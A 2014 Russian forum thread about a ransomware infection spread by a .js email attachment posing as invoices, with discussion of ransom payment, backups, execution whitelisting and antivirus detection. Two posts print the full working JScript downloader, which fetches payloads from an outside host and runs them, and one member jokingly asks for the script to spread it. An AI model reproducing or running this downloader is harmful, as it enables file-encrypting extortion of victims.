|
зашифрованы файлы keybtc@gmail_com | ☑ | ||
---|---|---|---|---|
0
zak555
12.08.14
✎
21:52
|
сегодня бух открыла некий архив, присланный по почте, и запустила из него скрипт
Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js который в итоге зашифровал все офисные файлы... куда копать ? |
|||
1
butterbean
12.08.14
✎
21:53
|
сговорилиись что-ли
|
|||
2
jsmith82
12.08.14
✎
21:56
|
дежавю
|
|||
3
Сержант 1С
12.08.14
✎
21:58
|
копать в сторону премиальной части буха и админа. Буха чтобы в следующий раз не запускала что попало, админа - что позволил крпитовирусу сьесть важные данные. Можно конечно еще кого-нибудь наказать за то, что антивируса нормального нет, но кто ж памятник накажет..
|
|||
4
zak555
12.08.14
✎
22:03
|
(3) каспер на том компе стоит
|
|||
5
zak555
12.08.14
✎
22:09
|
сейчас запустил этот скрипт на вирт машине -- зашифровал файлы
|
|||
6
zak555
12.08.14
✎
22:12
|
virusinfo.info говорит : Без оригинального дешифратора не обойтись
|
|||
7
zak555
12.08.14
✎
22:14
|
какой программой может промониторить, что происходит в системе ?
|
|||
8
zak555
12.08.14
✎
22:15
|
или как это скрипт запихнуть в отладчик, что пройти по шагово его ?
|
|||
9
sda553
12.08.14
✎
22:17
|
(8) Скорее всего шифрует ассимитричным алгоритмом, открытым ключом. поэтому зашифрованное без секретного ключа не расшифровать, даже изучив алгоритм по шагам
|
|||
10
Сержант 1С
12.08.14
✎
22:21
|
на диске должен лежать текстовый файл в котором координаты товарищей, которые за деньгу помогут расшифровать
берут кстати немного. Две недели назад на вот таком инциденте в таком файле нашел феерическое "напишите сколько сможете выслать". Кризис, видимо. |
|||
11
zak555
12.08.14
✎
22:24
|
кстати, без инет скрипт не работает
|
|||
12
zak555
12.08.14
✎
22:32
|
(10) видел про оплату через крипто-валюту
|
|||
13
Garykom
гуру
12.08.14
✎
22:57
|
(0) надо было отрубать комп из розетки и потом чем нибудь типа RStudio восстанавливать
но не прокатить если оно умное и не удаляет, а поверх перезаписывает файлы )) |
|||
14
HeroShima
12.08.14
✎
23:01
|
||||
15
zak555
12.08.14
✎
23:07
|
400 EUR за расшифровку
|
|||
16
Defender aka LINN
12.08.14
✎
23:08
|
У нас один магазин поймал такое. Вздохну, удалил к чертям зашифрованное вместе с вирусом да и все :)
|
|||
17
HeroShima
12.08.14
✎
23:19
|
(4) virustotal.com как на вирус реагирует?
|
|||
18
starfront1
12.08.14
✎
23:37
|
Здравствуйте, уважаемые форумчане.
Пишу Вам по той же причине. Друг по несчастью оплатил и получил ключ, а я вот сомневаюсь - платить или нет... Говорит, что ключ выслали в течение 30 минут и все расшифровал. Правда, ему цену назвали более-менее приемлемую (около 200 долларов). Посоветуйте, платить или нет... На антивирусных форумах все равно помощи никакой((( |
|||
19
Defender aka LINN
12.08.14
✎
23:39
|
(18) Дата регистрации: 12 августа 2014; сегодня.
Нюню. |
|||
20
Garykom
гуру
12.08.14
✎
23:41
|
(19) молодца так их террористов...
и им попавшимся тоже чтобы боялись )) ЗЫ тока ip то записать успели? |
|||
21
Ctrekoza
12.08.14
✎
23:48
|
(0) От кого пришло? От знакомых контрагентов пришло письмо? Почему открыла?
Как там у Булгакова? "Никогда не говори с незнакомцами..." |
|||
22
Партизан
13.08.14
✎
00:28
|
(4) ну сколько раз можно повторять - ни один "каспер" никогда не даст защиты, т.к. все антивирусы основаны на неактуальных черных списках. Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.
|
|||
23
Сержант 1С
13.08.14
✎
00:46
|
(22) базы платных антивирей актуальны на 99.99999% это раз, во-вторых есть эвристика
|
|||
24
Партизан
13.08.14
✎
00:50
|
(23) Да неужели? ))) сколько вирусов НЕ содержится в базе? Эвристика фигня.
|
|||
25
HeroShima
13.08.14
✎
01:30
|
Базы сигнатур более чем на ~10000000 не попадались, в то же время количество известных вирусов оценивается как превышающее 80 миллионов.
|
|||
26
mehfk
13.08.14
✎
05:37
|
(25) Одна запись в антивирусной базе как правило описывает несколько реальных вирусов.
|
|||
27
Romyr
13.08.14
✎
05:40
|
http://habrahabr.ru/post/159811/
авось поможет |
|||
28
vcv
13.08.14
✎
05:49
|
(23) Как говорится, "жизненный опыт, это знание, как не стоит поступать в ситуации, которая больше никогда не повторится".
Автор шифровальщика успеет собрать профит в тот краткий миг между заказом спам-рассылки и реакцией антивирусных компаний. А уж реакцию эвристики самых распространённых антивирусов автор шафровальщика проверил до того, как оплачивать спамерам рассылку. |
|||
29
zak555
13.08.14
✎
06:30
|
(21) да, от контрагента, с которым раньше работали
|
|||
30
zak555
13.08.14
✎
06:32
|
кстати, там вида ХР стоит
|
|||
31
Jokero
13.08.14
✎
07:55
|
(0) Копать в поддержку каспера, если он стоит. Зря что ли деньги плачены за лицензию?
|
|||
32
Сержант 1С
13.08.14
✎
08:02
|
(30) прекрасно! неумный пользователь за дырявой осью
|
|||
33
Бешеная Нога
13.08.14
✎
08:03
|
заплатите. люди же старались
|
|||
34
Escander
13.08.14
✎
08:13
|
+ (33) предварительно сообщив в управление-Р... может они ему фаберже открутят
|
|||
35
Трик
13.08.14
✎
08:17
|
(19) а вдруг он поиском нарвался на тему и зарегился на форуме, что бы узнать что к чему? А ты ему бан :(.
|
|||
36
Бешеная Нога
13.08.14
✎
08:17
|
кстати в полицию заяву на вымогательство обязательно напишите. лох лохом, но все же пусть полиция ловит преступников.
|
|||
37
BuHu
13.08.14
✎
08:18
|
(34) или заблокируют ящик , ну что бы никто ему денег не слал , ну и как результат не получит ключ
|
|||
38
Escander
13.08.14
✎
08:20
|
(37) думаю дним блокированием не ограничатся
|
|||
39
tdm
13.08.14
✎
08:26
|
(0) обычно платят, на будущее сделать выводы...
а так вообще у них фантазия норм работает одним моим знакомым пришло с вложением мол судебное распоряжение от приставов, от налоговой летит, причем почту придумывают подходящую...или знаю еще более веселый случай когда дважды шифрователь запустили - из разных писем, так один зашифровал а другой перешифровал(или они даже где-то пересеклись), в результате даже хакеры после оплаты ничего не смогли восстановить))) (34) а вы оптимист! хотя заявление да можно написать |
|||
40
Arhangeldk
13.08.14
✎
08:53
|
Вчера клиент тоже такую фигню подцепил. Пыталась открыть какую-то левую счет-факту. И самое интересное что зашифровались только базы 1С и бекапы.
|
|||
41
Любопытная
13.08.14
✎
08:54
|
(39) Деньги вернули?)
|
|||
42
Drac0
13.08.14
✎
08:54
|
(41) После жалобы в Роспотребнадзор )))
|
|||
43
torgm
13.08.14
✎
09:01
|
(8) У меня админ в таких случаях оставляет жить вирус на компе и ловит хэш :)
Сейчас развелось развелось семейство криптовирусов, которые проходят касперского на ура... Админу однозначно в лоб. 1. Вся важная инфа должна быть расположена на сервере 2. Данные должны бэкапиться .... |
|||
44
tdm
13.08.14
✎
09:06
|
(41) ага, в двойном размере)))
...ответом было что-то типа - мы не знали что так можно (сдается мне грядёт шифровальшик 2.0 с новой фитчей - будет требоваться 2 ключа!!!)))) |
|||
45
HeroShima
13.08.14
✎
09:29
|
(26) Как правило нет.
|
|||
46
zak555
13.08.14
✎
11:41
|
(32) какая разница ?
этот скрипт та же влезает и в вин7 |
|||
47
zak555
13.08.14
✎
11:42
|
(33) это самое простое
|
|||
48
zak555
13.08.14
✎
11:44
|
(37) по скольку вирь стал сам рассылать по адресной книге самого себя, то могу предположить, что в "центр" уже сообщён адрес почты жертвы
это на тот случай, когда ящик заблокировать чтобы заблокированному написать с другого =) |
|||
49
zak555
13.08.14
✎
11:45
|
(43) там один гб+бух+ген
|
|||
50
Ёпрст
13.08.14
✎
11:49
|
(0) пришли мне этот скрипт на [email protected]
тоже буду рассылать подарки |
|||
51
zak555
13.08.14
✎
11:53
|
(50) ушло
|
|||
52
Fram
13.08.14
✎
11:53
|
(19) и ТС за одно :)
|
|||
53
zak555
13.08.14
✎
11:53
|
скрипт не сложный
|
|||
54
zak555
13.08.14
✎
11:55
|
||||
55
Ёпрст
13.08.14
✎
12:05
|
(54) какой-то битый архив
|
|||
56
zak555
13.08.14
✎
12:06
|
(55) он не открывается ?
|
|||
57
zak555
13.08.14
✎
12:07
|
у меня открывается
|
|||
58
Злопчинский
13.08.14
✎
12:08
|
Вчера и у меня пытался прорваться вирус аналогичный - вложение типа договор-черновик. нод вроде отловил.
админ в отпуске. посмотрим что будет... |
|||
59
Ёпрст
13.08.14
✎
12:08
|
(56) ага
|
|||
60
zak555
13.08.14
✎
12:08
|
(58) надо было отключить и посмотреть, что внутри
|
|||
61
Ёпрст
13.08.14
✎
12:09
|
можешь js унутри архива переименовать в txt и еще раз перевыложить ?
|
|||
62
zak555
13.08.14
✎
12:10
|
содержание
Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js //////////////////// autreplcant je us ////////////////// //////////////////// spm ml to extrcd //////////////////// ////// established /////// function reps(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}function CreateObject(c){return new ActiveXObject(c)} var nosensetoabuse="earthlingsfilm.com",tfool="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell"),earthlingsf="%TEMP%\\keybtc.cmd",rotadm="images",WshShell=CreateObject("WScript.Shell"),tfool=WshShell.ExpandEnvironmentStrings(tfool),docs="%TEMP%\\doc.doc";try{reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc"),WshShell.Run(""+docs+"",1,0)}catch(word){}reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd");WshShell.Run(""+earthlingsf+"",0,0); /////// goodbye hooray /////// |
|||
63
Партизан
13.08.14
✎
12:11
|
у меня нормально открылся:
//////////////////// autreplcant je us ////////////////// //////////////////// spm ml to extrcd //////////////////// ////// established /////// function reps(c,d) { var b=new ActiveXObject("MSXML2.XMLHTTP"); b.onreadystatechange=function() { if(4===b.readyState) { var a=new ActiveXObject("ADODB.Stream"); a.open(); a.type=1; a.write(b.ResponseBody); a.position=0; a.saveToFile(d,2); a.close() } }; b.open("GET",c,!1); b.send() } function CreateObject(c) { return new ActiveXObject(c) } var nosensetoabuse="earthlingsfilm.com", tfool="%TEMP%\\", WshShell=WScript.CreateObject("WScript.Shell"), earthlingsf="%TEMP%\\keybtc.cmd", rotadm="images", WshShell=CreateObject("WScript.Shell"), tfool=WshShell.ExpandEnvironmentStrings(tfool), docs="%TEMP%\\doc.doc"; try { reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc"), WshShell.Run(""+docs+"",1,0) } catch(word){} reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd"); WshShell.Run(""+earthlingsf+"",0,0); /////// goodbye hooray /////// |
|||
64
zak555
13.08.14
✎
12:14
|
(63) он качает с сайта тело и запускает его
|
|||
65
Velman
13.08.14
✎
12:14
|
1. Админ нафига дал права на админскую учетку у буха
2. Это не вирус, а тупо шифратор... 3. Админу ноги вырвать и ж... |
|||
66
zak555
13.08.14
✎
12:16
|
(65) нету одминов
|
|||
67
Партизан
13.08.14
✎
12:17
|
(64) Оо у вас разрешены скачка исполняемых файлов пользователям?? )))
|
|||
68
zak555
13.08.14
✎
12:17
|
(67) ты его запусти у себя
|
|||
69
Ёпрст
13.08.14
✎
12:18
|
(62) ага, спасиб
просто антивирусняк выкашивает содержимое :)) |
|||
70
zak555
13.08.14
✎
12:19
|
(69) яндекс тупо удалил из отправленных и не отправил =)
|
|||
71
Партизан
13.08.14
✎
12:19
|
(68) че-то не запускается, ибо (22)
|
|||
72
Velman
13.08.14
✎
12:20
|
скажите своим админам чтоб теневое копирование сделали... Хоть что то, но восстановится! А так платить придется.
|
|||
73
zak555
13.08.14
✎
12:20
|
(71) так не все же это делают
|
|||
74
zak555
13.08.14
✎
12:20
|
(72) одинов нет
|
|||
75
Velman
13.08.14
✎
12:21
|
(74) Экономят?
|
|||
76
Velman
13.08.14
✎
12:23
|
Или маленькая фирма?
|
|||
77
zak555
13.08.14
✎
12:24
|
(75) (76) мини фирма
|
|||
78
zak555
13.08.14
✎
12:24
|
кстати, скрипт отрабатывает даже под обычным пользователем
|
|||
79
KENT2007
13.08.14
✎
12:30
|
вчера только попались, зашифровалась даже база 1с +флешки+ архивы 1с)
хотя раб стол не тронул. там и был последний архив 1с. при отправке файлов по инструкции к оплате выставили счет 3.8 тысруб |
|||
80
Velman
13.08.14
✎
12:39
|
(77) Мы тоже так разок влетели) у нас на фирме 1400 чел, активных в 1С около 50, спасло архивирование, и то что архив в инет (сервер) не лез. И не в домене.
|
|||
81
Партизан
13.08.14
✎
12:44
|
вообще, в целях той-же сохранности DBF базы, к примеру (не только от шифраторов, но и от инсайдеров-сливальщиков) , есть большой смысл запретить в правах пользователей листинг директорий, т.е. невозможно будет получить стандартными методами список файлов в каталоге базы. При этом 1С-ка будет нормально работать, т.к. все имена файлов для нее известны заранее.
|
|||
82
zak555
13.08.14
✎
12:44
|
(22) > Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.
как средствами винды такое включить ? |
|||
83
zak555
13.08.14
✎
12:45
|
(81) это если домен есть
|
|||
84
Партизан
13.08.14
✎
12:47
|
(83) нет, у меня домена нет, такое используется для защиты баз 1С. Права настроены в свойствах папок на вкладке безопасность.
(82) Локальная политика безопасности / Политики ограниченного использования программ / создать/. По умолчанию / не разрешено. ну и дальше рулить как надо. |
|||
85
Velman
13.08.14
✎
12:51
|
Там все юзеры админы что ли?
|
|||
86
ildary
13.08.14
✎
12:58
|
(81) нельзя ли поподробнее - как это сделать, точнее - какой пункт запретить в NTFS?
|
|||
87
Партизан
13.08.14
✎
12:58
|
+(84)
здесь подробно: http://www.windowsfaq.ru/content/view/694/46/ |
|||
88
Партизан
13.08.14
✎
13:02
|
(86) я щас не на работе, скриншот не могу сделать, вроде "содержимое папки" но не только это.
|
|||
89
zak555
13.08.14
✎
13:15
|
(85) не админские права всё ранво запускают скрипт
(87) сейчас проверю |
|||
90
ildary
13.08.14
✎
13:16
|
(88) я подожду, тема очень интересная, пожалуйста отпиши здесь, как появишься на работе.
|
|||
91
Velman
13.08.14
✎
13:19
|
(89) Антивирус какой?
|
|||
92
zak555
13.08.14
✎
13:25
|
(91) на той машины -- был каспер
|
|||
93
Партизан
13.08.14
✎
13:30
|
(91) ни один антивирус ("проходи, если не в розыске") не поможет, если политика доступа приложений на компьютер будет оставаться "добро пожаловать, гости дорогие!" , а не "Стоять! Кто идет?"
|
|||
94
NikVars
13.08.14
✎
13:36
|
(92) Понадеялась деваха на парня, стала мамой.
|
|||
95
Torquader
13.08.14
✎
13:42
|
В общем, есть мнение, что нужно просто переименовать WSCRIPT.EXE и MSHTA.EXE, если вы их не используете.
(А если используете, то поменять расширения). Тогда "всякая дрянь" не будет запускаться. P.S. на *.scr я уже поставил запуск программы с сообщением "Вы запустили вирус" - теперь такое же нужно делать и с *.vbs и *.js (ну и *.wsf не забыть). |
|||
96
Партизан
13.08.14
✎
13:43
|
(95) какая тяга к изобретению велосипедов с квадратными колесами )
|
|||
97
Torquader
13.08.14
✎
13:44
|
(81) Можно 1С запускать через RunAs от другой учётки с сохранением пароля (есть такая возможность), тогда к базе 1С будет доступ только у самой 1С.
А ещё лучше браузер запускать из под пользователя guest с очень урезанными правами - проблема только в том, что потом пользователи не могут открыть документы напрямую - но это решается использованием папки запуска где уже js-файл от doc-файла прекрасно отличат. |
|||
98
Torquader
13.08.14
✎
13:46
|
Не забываем, что js-файл - это сценарий, и его текст можно достаточно произвольно менять, перенося нужные вызовы из одной функции в другую - так что даже антивирус с эвристикой не поймёт что и к чему.
|
|||
99
Velman
13.08.14
✎
13:54
|
(93) У нас стоит доктор веб, он в настройках запрещает автозапуск программ. Про хост уже молу даже..
|
|||
100
13_Mult
13.08.14
✎
14:15
|
Вот опять кого-то зашифровали. ))
Кто же пользователям под админом то даёт работать. Только ограниченную учетку и ни каких вирусов/скриптов. )) |
|||
101
zak555
13.08.14
✎
14:16
|
(87) да, уровень безопасности Не разрешено -- запрещает выполнение
а как тогда обмениваться политиками между разными конторами ? |
|||
102
zak555
13.08.14
✎
14:31
|
+ (101)
про политики вопрос : для политики "Локальный компьютер" установил уровень безопасности -- Не разрешено применять политику для всех, кроме одминов почему тогда скрипт по-прежнему не запускается под одмином ? |
|||
103
Torquader
13.08.14
✎
14:57
|
(100) Даже если учётка ограничена, то всё равно все пользовательские файлы ей доступны, а то, что вирус в системной директории не побывал - это пользователя не спасает.
Просто, когда потом заходишь под админом, то даже поиск вируса занимает очень много времени (найти exe-файл в куче папок пользователя даже CureIt не сразу может). |
|||
104
Ctrekoza
13.08.14
✎
14:58
|
(29) Я не открываю письма, если знаю что не жду от них ничего. Недавно похожее было. Типа пришло коммерческое предложение, я не открыла, т.к. нам от них ничего не нужно было. Самое смешное произошло через два дня. В этом письме появилось новое письмо с новой датой и заголовком типа "я вот недавно подумал.." - рассчитано на слишком любопытных.... Тогда я уже просто перезвонила контрагенту и спросила, они ответили что не отсылали. Письмо пошло в спам без открытия...
|
|||
105
zak555
13.08.14
✎
15:05
|
(104) значит можешь попасться, когда придёт вирус от нужного контрагента
|
|||
106
Ctrekoza
13.08.14
✎
15:08
|
(105) В смысле? Я знаю точно чей файл, значит отвечать будет контрагент, если у меня полет базы.
|
|||
107
zak555
13.08.14
✎
15:09
|
расширения файлов, которые шифрует вирус:
(*.xls *.xlsx *.doc *.docx *.xlsm *.jpg *.cdr *.pdf *.cd *.slddrw *.dwg *.accdb *.ai *.svg *.mdb *.1cd *.zip *.rar *.max) |
|||
108
Torquader
13.08.14
✎
15:14
|
(106) Подлинность электронного письма сейчас проверить достаточно сложно, особенно, если используется общедоступный mail-сервер.
|
|||
109
бомболюк
13.08.14
✎
15:14
|
(107) судя по расширениям 1С 7.7 устояла бы ;-)
|
|||
110
Torquader
13.08.14
✎
15:14
|
(107) А почему в списке нет txt-файлов ?
|
|||
111
NikVars
13.08.14
✎
15:14
|
(107) Ты думешь касперу будет интересен твой список?
|
|||
112
Ctrekoza
13.08.14
✎
15:15
|
(108) Есть же люди, которые занимаются киберпреступностью. Туда заяву и вперед пусть выясняют...
|
|||
113
Torquader
13.08.14
✎
15:17
|
(112) Так вам нужно чтобы кого-то наказали или чтобы ваши файлы остались целы ?
|
|||
114
Ctrekoza
13.08.14
✎
15:17
|
(107) Ну 1с точно можно спасти, просто нужно копировать файлы на переносной диск пере выходом в инет с компа, где находится база....
|
|||
115
NikVars
13.08.14
✎
15:18
|
(112) Пенты очень любят адресные заявы. Заява от конкретика на конкретика. А тут возьни дофига, вероятность потуг большая, а выхлопа не будет. Да и нет ущерба на миллиарды рубликов.
|
|||
116
Torquader
13.08.14
✎
15:18
|
Кстати, элемент списка контроля доступа "запрет" имеют приоритет над "разрешено", так что любимые фотографии можно просто запретить за запись и удаление всем, кроме особенной учётки.
|
|||
117
zak555
13.08.14
✎
15:18
|
(110) не знаю
|
|||
118
Ctrekoza
13.08.14
✎
15:18
|
(113) Мне нужно чтобы остались целы. Ну а наказание мошенникам, пока никто не отменял, в случае форс-мажора...
|
|||
119
HeroShima
13.08.14
✎
15:18
|
||||
120
zak555
13.08.14
✎
15:19
|
(114) только 8ку нужно переименовать )))
|
|||
121
Torquader
13.08.14
✎
15:20
|
(114) У меня в одной конторе бухгалтера в инет ходят с одной машины, а вся бухгалтерия - на другой.
|
|||
122
zak555
13.08.14
✎
15:20
|
(118) ребята на самом деле молодцы
|
|||
123
Ctrekoza
13.08.14
✎
15:20
|
(120) Зачем? Тупо копируешь на диск на всякий случай...
|
|||
124
zak555
13.08.14
✎
15:20
|
(121) в БД копированием ничего не вносят ?
|
|||
125
zak555
13.08.14
✎
15:21
|
(123) скрипт-шифровальщик идёт по ВСЕ подключённым дискам/флешкам/сетевым ресурсам
|
|||
126
Ctrekoza
13.08.14
✎
15:21
|
(121) Я тоже так делаю....
|
|||
127
Torquader
13.08.14
✎
15:21
|
(124) На компе с БД запустить можно только ограниченный список задач - даже время поменять - говорит "нельзя запускать RunDll32.exe"
|
|||
128
zak555
13.08.14
✎
15:22
|
(119) кстати, антивирь от мс -- сработал
|
|||
129
zak555
13.08.14
✎
15:26
|
(127) запустить счет на оплату и словить скрипт
|
|||
130
Torquader
13.08.14
✎
15:27
|
(128) По идее, антивирус должен срабатывать не на сам скрипт, а на то, что он загружает.
С другой стороны, получение в сценарии какого-то файла и его запуск на исполнение уже должны рассматриваться как вирус. P.S. с Windows XP для этого был даже поток файла с указанием зоны получения введён, чтобы давать различные разрешения на различные файлы, только почему-то оно так и не заработало, как должно. И, самое главное, что должен быть правильно настроен firewall, чтобы ни одна программа, кроме браузера, не имела подключение к интернету, а особенно сценарии. |
|||
131
HeroShima
13.08.14
✎
15:28
|
(128) Ага. Причем узнал в лицо.
|
|||
132
NikVars
13.08.14
✎
15:28
|
(121) Это мало защит от загаженных флешек, особенно - после разных там ПФР и налоговых.
|
|||
133
Ctrekoza
13.08.14
✎
15:29
|
(129) Не пойму. А что его запускать? Открывай только для чтения. Винда сама это делает неплохо.
|
|||
134
Torquader
13.08.14
✎
15:29
|
(129) Ну и как они его запустят ?
Запустить можно только exe-файл из списка или lnk-файл с подписью. Ну а если кто-то нажимает на js-файл, он видит его на экране в блокноте - ну и пусть печатают, видят же, что не счёт. |
|||
135
zak555
13.08.14
✎
15:30
|
(132) носи в фонды/инспекции sd-карты
|
|||
136
zak555
13.08.14
✎
15:31
|
(133) это как ?
|
|||
137
zak555
13.08.14
✎
15:31
|
(134) а винда по умолчанию вызывает программу по выполнению скрипта *?
|
|||
138
Torquader
13.08.14
✎
15:31
|
(132) Ну на flash-диске прекрасно создаётся папка AUTORUN.INF с файлом внутри, который удалить нельзя (имя файла с ошибкой) и всё.
|
|||
139
Torquader
13.08.14
✎
15:32
|
(137) regedit.exe вам в помощь - винда прекрасно запоминает, что нужно делать с тем или иным файлом.
|
|||
140
zak555
13.08.14
✎
15:33
|
(138) почему никак не удалишь ?
(139) сейчас посмотрю |
|||
141
NikVars
13.08.14
✎
15:34
|
(138) Ну-ну... Она создается тогда, когда попала в руки админу. В бюстгалтерии - ничего кроме проводок Дт-Кт не создается.
|
|||
142
HeroShima
13.08.14
✎
15:35
|
К слову о сигнатурах, (62) с обрезанными комментариями:
https://www.virustotal.com/ru/file/703ccfb749c9b0842addd9376aa92c2afd10f220dec60c220b5ca4d34317f34c/analysis/1407929616/ |
|||
143
zak555
13.08.14
✎
15:37
|
(142) т.е. если убрать комменты, то каспер видит ?
|
|||
144
HeroShima
13.08.14
✎
15:38
|
(143) Не знаю, но там ещё и формат другой.
|
|||
145
HeroShima
13.08.14
✎
15:41
|
Не, на одни комменты не реагируют.
|
|||
146
Партизан
13.08.14
✎
23:16
|
(97) Под одинаковым пользователем 1С запускать нежелательно, а на каждого пользователя дублировать еще одну учетку неприемлемо. Опять-же на каждом рабочем месте ходить запоминать пароли тоже. Проще и надежнее один раз настроить права доступа к файлам, разрешив только те файловые операции (а не просто чтение/запись), которые необходимы и достаточны.
(99) а причем тут автозапуск? Пользователь сам запустит ничего не подозревая. (102) после внесенных изменений перезагрузи параметры безопасности. (106) контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. (143) нет, если ничего не убирая и не меняя просто отформатировать исходный (62) текст для удобочитатемости, как в (63), то каспер перестает видеть, вот она, хваленая "эвристика" каспера. |
|||
147
zak555
13.08.14
✎
23:19
|
(146)
> после внесенных изменений перезагрузи параметры безопасности. не отработало > контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно |
|||
148
Ctrekoza
13.08.14
✎
23:35
|
(146)+(147) + контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. >>
Если подписывает ЭЦП, тогда должна стоять программа Крипто-Про и обычно в этом случае файлы идут через оператора, а он отвечает за безопасность. ИМХО: вероятность, что такой файл будет нести вирус очень даже низкая, если не нулевая. контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно>>> Если нет определенного уровня защиты и доступ к исполняемым файлам у всех, кто подошел к компу, тогда это преступная халатность или провокация преступления... Как-то так :) |
|||
149
zak555
13.08.14
✎
23:42
|
(148)
пусть даже другой пример я подписал архив, в котором каким-то образовал оказался скрипт, который всё шифрует если получатель его запустит -- всё равно не буду ни за что отвечать, т.к. не было умысла |
|||
150
Партизан
13.08.14
✎
23:43
|
(148) а причем тут крипто-про? Для подписания он не обязателен, как и оператор. Много лет назад, когда только начинали работать с ЭЦП, из налоговой нам как-то раз приходил вордовский документ, зараженный вирусом и подписанный ЭЦП.
|
|||
151
Партизан
13.08.14
✎
23:59
|
(149) >>"т.к. не было умысла"
тогда ч.2 ст 273 )) "2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок до семи лет." |
|||
152
zak555
14.08.14
✎
00:04
|
||||
153
Ctrekoza
14.08.14
✎
00:11
|
(150) Теперь всё подписывают КЭП, а она требует установки Крипто. Там по лицензированию оператора это связано... если коротко..
|
|||
154
zak555
14.08.14
✎
00:13
|
(153) криптоПРО - это один из крипто-программ
есть и бесплатные аналоги |
|||
155
Franchiser
гуру
14.08.14
✎
00:16
|
Был у меня один клиент, зашифровались файлы базы 1с7.7 dbf заплатили хакерам. Ждали чуть больше недели правда. Я столько же денег заработал или даже больше за помощь.
|
|||
156
Franchiser
гуру
14.08.14
✎
00:17
|
(154) предлагаю с буха взять денег и за его счет решить проблему, ну и себе процент.
|
|||
157
zak555
14.08.14
✎
00:21
|
(156) денег брать надо с дира, а не буха
|
|||
158
Ctrekoza
14.08.14
✎
00:21
|
zak555, ты решил свой вопрос и как? Интересно, же...
|
|||
159
zak555
14.08.14
✎
00:24
|
(158) пока нет
но я почитал на форуме др.веба, что шифровальщик подразделяется на несколько классов -- часть можно уже расшифровать, а часть нет сейчас компа у меня нет |
|||
160
Партизан
14.08.14
✎
00:25
|
||||
161
Ctrekoza
14.08.14
✎
00:28
|
(160) Уже год, как отчетность должна подписываться только КЭП (квалифицированная электронная подпись) приравнена в ГК РФ к собственноручной подписи.
|
|||
162
Партизан
14.08.14
✎
00:29
|
(161) аа, а я подумал, что КЭП - программа какая-то ))
ну пару реквизитов в сертификат добавили, а суть-то таже. |
|||
163
zak555
14.08.14
✎
00:30
|
(161) что значит должна ?
|
|||
164
zak555
14.08.14
✎
00:34
|
(160) читаем
Федеральный закон Российской Федерации от 7 декабря 2011 г. N 420-ФЗ -- пункт 188) статьи 1 http://www.rg.ru/2011/12/08/p-raboty-site-dok.html |
|||
165
Ctrekoza
14.08.14
✎
00:39
|
(163) Отчеты как сдаешь? Вот подписываем теперь всё КЭП (усиленная квалифицированная электронная подпись) сертификация такая. С другой подписью отчет по ТКС не примут. Пойдешь ножками или по почте...
|
|||
166
zak555
14.08.14
✎
00:42
|
(165) ножками сдаю
|
|||
167
Ctrekoza
14.08.14
✎
00:46
|
(166)Фи, не стыдно? Чай, не в деревне находишься... Да и НДС теперь по ТКС сдают, как-бы...
Вот первая ссылка, там внутри текста есть ссылки на новый закон по КЭП и декларацию по НДС http://www.buhonline.ru/pub/tks/2014/4/8529 |
|||
168
zak555
14.08.14
✎
00:48
|
(167)
а что стыдиться ? адрес места нахождения юрлица находится недалеко от налоговой, после сдачи отчётов иди за почтой отказать в приёме ндс на бумаге никто не вправе |
|||
169
Ctrekoza
14.08.14
✎
00:59
|
(168) Ну это не совсем так, если выставляете и платите НДС.
------------------ http://www.buhonline.ru/pub/tks/2014/3/8401 ФНС напомнила, что декларации по НДС за первый квартал 2014 года необходимо отправить в электронном виде не позднее 20 апреля Обязанность по представлению деклараций по НДС исключительно в электронном виде и только через оператора электронного документооборота закреплена за налогоплательщиками пунктом 3 статьи 80 и пунктом 5 статьи 174 Налогового кодекса. Соответствующие изменения в данные нормы были внесены Федеральным законом от 28.06.13 № 134-ФЗ* |
|||
170
Партизан
14.08.14
✎
01:46
|
(169) а как быть тем, у кого в округе нет интернета? совсем нет, даже сотовый на улице не ловит.
|
|||
171
Ctrekoza
14.08.14
✎
01:54
|
(170) В стать 174 п.5 нет ничего про отсутствие связи. Есть обязанность в электронном виде.
Значит, если живет в лесу, будет платить ЕСХН, т.е. без НДС.... |
|||
172
Партизан
14.08.14
✎
01:58
|
(171) как организация, занимающаяся куплей-продажей в розницу может платить сельхозналог? ))
|
|||
173
Ctrekoza
14.08.14
✎
02:03
|
(172) Так в лесу же...:)
|
|||
174
Партизан
14.08.14
✎
02:15
|
(173) ну и что, они (2 филиала у нас таких есть) не только в лесу, но и еще дорога к ним не круглый год бывает, а только когда паром ходит и лед замерзнет, причем в одном филиале платежки в банк (чужого региона) на бумаге возят, а другие вообще всегда только за наличку за товаром ездят.
|
|||
175
